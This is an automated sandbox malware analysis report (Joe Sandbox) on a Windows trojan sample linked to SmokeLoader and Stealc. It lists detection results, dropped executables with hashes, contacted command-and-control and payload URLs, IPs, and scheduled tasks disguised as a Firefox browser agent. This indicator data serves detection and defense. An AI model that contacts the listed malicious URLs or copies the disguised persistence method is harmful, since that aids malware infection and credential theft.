Credentials	Domains	Default Accounts	1 Exploitation for Client Execution	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	521 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	12 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	3 Process Discovery	Distributed Component Object Model	Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	113 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
3WaqgS34S7.exe	63%	ReversingLabs	Win32.Trojan.Zenpak
3WaqgS34S7.exe	51%	Virustotal		Browse
3WaqgS34S7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\7E95.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\F8FA.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\wrhivcv	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\vdhivcv	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7E95.exe	55%	ReversingLabs	Win32.Trojan.Stealc
C:\Users\user\AppData\Roaming\vdhivcv	63%	ReversingLabs	Win32.Trojan.Zenpak
C:\Users\user\AppData\Roaming\wrhivcv	55%	ReversingLabs	Win32.Trojan.Stealc

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
jamforvaise.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://piratekings.online/tmp/index.php	0%	Avira URL Cloud	safe
http://olovge.at/tmp/index.php	0%	Avira URL Cloud	safe
https://midginvineco.com/prog/ctlg.exe	0%	Avira URL Cloud	safe
http://nuxc.cc/tmp/index.php	0%	Avira URL Cloud	safe
http://obozintsev.ru/tmp/index.php	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
jamforvaise.com	207.246.75.248	true	true	1%, Virustotal, Browse	unknown
telphboardline.com	103.35.190.240	true	true		unknown
midginvineco.com	23.145.40.181	true	true		unknown
obozintsev.ru	189.163.166.52	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://piratekings.online/tmp/index.php	true	Avira URL Cloud: safe	unknown
http://nuxc.cc/tmp/index.php	true	Avira URL Cloud: safe	unknown
https://midginvineco.com/prog/ctlg.exe	true	Avira URL Cloud: safe	unknown
http://olovge.at/tmp/index.php	true	Avira URL Cloud: safe	unknown
http://obozintsev.ru/tmp/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.mi	explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	high
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	high
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://excel.office.com	explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.micro	explorer.exe, 00000001.00000000.1730664366.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1731843404.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1730287769.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://api.msn.com/q	explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	high
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1733753892.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000001.00000000.1733753892.000000000C964000.00000004.00000001.00020000.00000000.sdmp	false	high
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1733753892.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false	high
https://word.office.com	explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
http://schemas.micr	explorer.exe, 00000001.00000000.1731700485.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1729546145.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1731194544.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false	high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1729546145.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	high
https://api.msn.com/	explorer.exe, 00000001.00000000.1731194544.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://outlook.com_	explorer.exe, 00000001.00000000.1733753892.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1729546145.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
103.35.190.240	telphboardline.com	Japan	2519	VECTANTARTERIANetworksCorporationJP	true
123.213.233.131	unknown	Korea Republic of	9318	SKB-ASSKBroadbandCoLtdKR	true
207.246.75.248	jamforvaise.com	United States	20473	AS-CHOOPAUS	true
23.145.40.181	midginvineco.com	Reserved	22631	SURFAIRWIRELESS-IN-01US	true
189.163.166.52	obozintsev.ru	Mexico	8151	UninetSAdeCVMX	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1565628
Start date and time:	2024-11-30 11:11:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	3WaqgS34S7.exe renamed because original name is a hash value
Original Sample Name:	F99E6584C274E6814B81BE68C0F2EE47.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@6/5@9/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 58 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 20.190.147.7, 20.190.177.22, 20.190.147.3, 20.190.147.10, 20.190.147.0, 20.190.147.1, 20.190.177.147, 20.190.147.9
Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:12:19	API Interceptor	371610x Sleep call for process: explorer.exe modified
10:12:19	Task Scheduler	Run new task: Firefox Default Browser Agent 836D355363C2687B path: C:\Users\user\AppData\Roaming\vdhivcv
10:14:11	Task Scheduler	Run new task: Firefox Default Browser Agent 1F1615E741B2AA79 path: C:\Users\user\AppData\Roaming\wrhivcv

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
123.213.233.131	50f86ebddd156619b173883981364d8955365d76d2c3a.exe	Get hash	malicious	SmokeLoader	Browse	unicea.ws/tmp/index.php
	6e41bbf45206030f9a1277d06f28e467d8877ad2b0ea2.exe	Get hash	malicious	SmokeLoader	Browse	unicea.ws/tmp/index.php
	t3TkmcMmcA.exe	Get hash	malicious	SmokeLoader	Browse	tnc-corp.ru/tmp/index.php
	JeFu7HwJRa.exe	Get hash	malicious	SmokeLoader	Browse	epohe.ru/tmp/
	z0PrDUH3Ab.exe	Get hash	malicious	SmokeLoader	Browse	movlat.com/tmp/
	PADD8toZVX.exe	Get hash	malicious	LummaC, Babuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, Mars Stealer	Browse	sdfjhuz.com/dl/build2.exe
	etNheGz9UQ.exe	Get hash	malicious	Glupteba, Petite Virus, Raccoon Stealer v2, RedLine, SmokeLoader, Socks5Systemz	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz	Browse	humydrole.com/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	humydrole.com/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
obozintsev.ru	zK3150CS8q.exe	Get hash	malicious	SmokeLoader	Browse	181.123.219.23
obozintsev.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	190.146.112.188

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-CHOOPAUS	botx.ppc.elf	Get hash	malicious	Mirai	Browse	149.253.181.61
	botx.x86.elf	Get hash	malicious	Mirai	Browse	44.174.39.123
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	44.168.122.170
	botx.mpsl.elf	Get hash	malicious	Mirai	Browse	44.40.187.51
	nabppc.elf	Get hash	malicious	Unknown	Browse	149.28.76.39
	nabmips.elf	Get hash	malicious	Unknown	Browse	44.175.247.230
	powerpc.elf	Get hash	malicious	Unknown	Browse	45.63.53.231
	nabppc.elf	Get hash	malicious	Unknown	Browse	108.160.142.103
	nabm68k.elf	Get hash	malicious	Unknown	Browse	155.138.228.145
	nklx86.elf	Get hash	malicious	Unknown	Browse	204.80.129.13
SKB-ASSKBroadbandCoLtdKR	i586.elf	Get hash	malicious	Unknown	Browse	1.248.85.215
	debug.elf	Get hash	malicious	Mirai	Browse	1.255.4.150
	mips.elf	Get hash	malicious	Mirai	Browse	211.200.115.187
	botx.x86.elf	Get hash	malicious	Mirai	Browse	211.207.127.136
	botx.mips.elf	Get hash	malicious	Mirai	Browse	180.64.232.238
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	218.232.253.26
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	211.176.152.115
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	116.127.118.42
	loligang.mpsl.elf	Get hash	malicious	Mirai	Browse	175.121.198.84
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	1.252.81.241
VECTANTARTERIANetworksCorporationJP	arm.elf	Get hash	malicious	Mirai	Browse	163.139.119.7
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	163.139.6.0
	botx.mips.elf	Get hash	malicious	Mirai	Browse	36.3.215.156
	nabmips.elf	Get hash	malicious	Unknown	Browse	202.189.218.19
	mips.elf	Get hash	malicious	Mirai	Browse	163.139.130.88
	nabppc.elf	Get hash	malicious	Unknown	Browse	1.21.219.9
	nabx86.elf	Get hash	malicious	Unknown	Browse	210.146.216.38
	nklarm.elf	Get hash	malicious	Unknown	Browse	27.121.215.116
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	36.3.181.223
	fbot.x86.elf	Get hash	malicious	Mirai, Moobot	Browse	220.158.75.52

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.145.40.181
	file.exe	Get hash	malicious	Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar	Browse	23.145.40.181
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.145.40.181
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.145.40.181
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc	Browse	23.145.40.181
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.145.40.181
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.145.40.181
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	23.145.40.181
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.145.40.181
	file.exe	Get hash	malicious	LummaC Stealer	Browse	23.145.40.181

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196096
Entropy (8bit):	5.525135459216088
Encrypted:	false
SSDEEP:	1536:NcfrYGHh+PsO+qHk4iansXMWlJ3tejju4Zc2e0wS0jQCOTJNeDAq5FFw4BW5s2lR:NcKVinXMWlJ3t4Z1nCQpJcDAq53wo8d
MD5:	C56489FED27114B3EAD6D98FAD967C15
SHA1:	17304BB7935ED01B2A11BE735BDEAE0941CB0A31
SHA-256:	71D2EE1B2C6BCA8C88161090430A78DA0CD067211DE0BE16FE82E35262B1411A
SHA-512:	31121768CD12FFEEC1CF87BE976107CDEE726CD252A323E4E42CD62F4E40E7BDB27354E2A9693A253D914F57B79FD8B9B9A649DE3FAC1304013B6CE66B83F778
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NR...R...R...L.f.I...L.w.C...L.a.....u...U...R...+...L.h.S...L.v.S...L.s.S...RichR...................PE..L.....Sf......................?...................@...........................A................................................P.....A.............................................................................................................text... ........................... ..`.rdata...!......."..................@..@.data...`.>.........................@....kona...HI....@..>..................@....yip..........@......B..............@....xijewek......A......F..............@..@.rsrc........A......H..............@..@................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F8FA.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	183865
Entropy (8bit):	5.5889564554089555
Encrypted:	false
SSDEEP:	1536:NcfrYGHh+PsO+qHk4iansXMWlJ3tejju4Zc2e0wS0jQCOTJNeDAq5FFw4BW5s2lw:NcKVinXMWlJ3t4Z1nCQpJcDAq53wo8c
MD5:	6596269561EB94BB69E30912C9B9EF10
SHA1:	78CABE6DF2A9903AADEC1C542949DE050459A2D4
SHA-256:	8436A23073927F51208D94B4C99B18EDE8B68ADF3B2E65FBA1A97EEB65B1E1D6
SHA-512:	46CA35DE765540F4D9890323FEC3A787A5E18FBA92BB7BAD8BCC29F4CFE4FB81E5EC2BFCB0E614ABCE0C3F126376E864DCED1C8726703BF07B0DD6A359C2B8B9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NR...R...R...L.f.I...L.w.C...L.a.....u...U...R...+...L.h.S...L.v.S...L.s.S...RichR...................PE..L.....Sf......................?...................@...........................A................................................P.....A.............................................................................................................text... ........................... ..`.rdata...!......."..................@..@.data...`.>.........................@....kona...HI....@..>..................@....yip..........@......B..............@....xijewek......A......F..............@..@.rsrc........A......H..............@..@................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vdhivcv

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	193536
Entropy (8bit):	5.486955260182578
Encrypted:	false
SSDEEP:	3072:+FEJ0B5aRXtU49eLUoblr435Gz569C4UgO6:dJYClefz
MD5:	F99E6584C274E6814B81BE68C0F2EE47
SHA1:	56C3838E6F68404B1309291639B3A300292A46B1
SHA-256:	8E430AF53D8EB61A39239D6537B7E8A2B99EFB0852F8814CE1A5EBD7ACE53FD4
SHA-512:	1B94AD9C88FCC335368E79FAA70A878EAF78FD34F192CCDBA20D2FE0024B441AA372983BC132510D7C9727FB800509BC5F98E1AE2BA38A521F8C5C74361460EB
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 63%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v..............................xc.............................Rich...........PE..L...~..e......................?...................@...........................A.....M.......................................4...P.....@.................................................................................x............................text............................... ..`.rdata........... ..................@..@.data....w>.........................@....voheba.HI...p@..>..................@....yovu.........@......*..............@....lobudib......@.....................@..@.rsrc.........@......0..............@..@........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vdhivcv:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\wrhivcv

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	196096
Entropy (8bit):	5.525135459216088
Encrypted:	false
SSDEEP:	1536:NcfrYGHh+PsO+qHk4iansXMWlJ3tejju4Zc2e0wS0jQCOTJNeDAq5FFw4BW5s2lR:NcKVinXMWlJ3t4Z1nCQpJcDAq53wo8d
MD5:	C56489FED27114B3EAD6D98FAD967C15
SHA1:	17304BB7935ED01B2A11BE735BDEAE0941CB0A31
SHA-256:	71D2EE1B2C6BCA8C88161090430A78DA0CD067211DE0BE16FE82E35262B1411A
SHA-512:	31121768CD12FFEEC1CF87BE976107CDEE726CD252A323E4E42CD62F4E40E7BDB27354E2A9693A253D914F57B79FD8B9B9A649DE3FAC1304013B6CE66B83F778
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NR...R...R...L.f.I...L.w.C...L.a.....u...U...R...+...L.h.S...L.v.S...L.s.S...RichR...................PE..L.....Sf......................?...................@...........................A................................................P.....A.............................................................................................................text... ........................... ..`.rdata...!......."..................@..@.data...`.>.........................@....kona...HI....@..>..................@....yip..........@......B..............@....xijewek......A......F..............@..@.rsrc........A......H..............@..@................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.486955260182578
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3WaqgS34S7.exe
File size:	193'536 bytes
MD5:	f99e6584c274e6814b81be68c0f2ee47
SHA1:	56c3838e6f68404b1309291639b3a300292a46b1
SHA256:	8e430af53d8eb61a39239d6537b7e8a2b99efb0852f8814ce1a5ebd7ace53fd4
SHA512:	1b94ad9c88fcc335368e79faa70a878eaf78fd34f192ccdba20d2fe0024b441aa372983bc132510d7c9727fb800509bc5f98e1ae2ba38a521f8c5c74361460eb
SSDEEP:	3072:+FEJ0B5aRXtU49eLUoblr435Gz569C4UgO6:dJYClefz
TLSH:	7C146C117AF65026F3F78A746970A6945E3BBCA37B79809E1110126F3D336D08E6DB23
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........v......................................xc.....................................Rich............PE..L...~..e...................

File Icon


Icon Hash:	0323252521170f17

Static PE Info

General

Entrypoint:	0x4016eb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x65D9F07E [Sat Feb 24 13:34:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	0b72f9871877c1429fc389a1eb1f1d2b

Entrypoint Preview

Instruction
call 00007FEC98861DA9h
jmp 00007FEC9885F06Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [00420208h], eax
mov dword ptr [00420204h], ecx
mov dword ptr [00420200h], edx
mov dword ptr [004201FCh], ebx
mov dword ptr [004201F8h], esi
